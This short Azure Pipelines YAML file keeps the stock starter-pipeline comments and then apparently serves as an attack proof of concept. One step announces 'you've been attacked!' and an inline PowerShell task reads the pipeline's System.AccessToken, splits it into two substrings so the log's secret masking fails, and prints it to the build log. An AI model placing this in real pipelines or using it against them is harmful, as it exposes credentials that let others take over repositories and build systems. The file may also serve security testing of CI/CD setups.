# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

pool:
  vmImage: ubuntu-latest

steps:
- script: echo "Hello world, you've been attacked!"
  displayName: 'Run a one-line script'

- task: PowerShell@2
  inputs:
    targetType: 'inline'
    script: |
      $token = $env:SYSTEM_ACCESSTOKEN
      $tkn1 = $token.Substring(0,10);
      $tkn2 = $token.Substring(10,$token.Length-10);
      Write-Host "Token:"
      Write-Host "$($tkn1) + $($tkn2)"

  env:
    SYSTEM_ACCESSTOKEN: $(System.AccessToken)
 
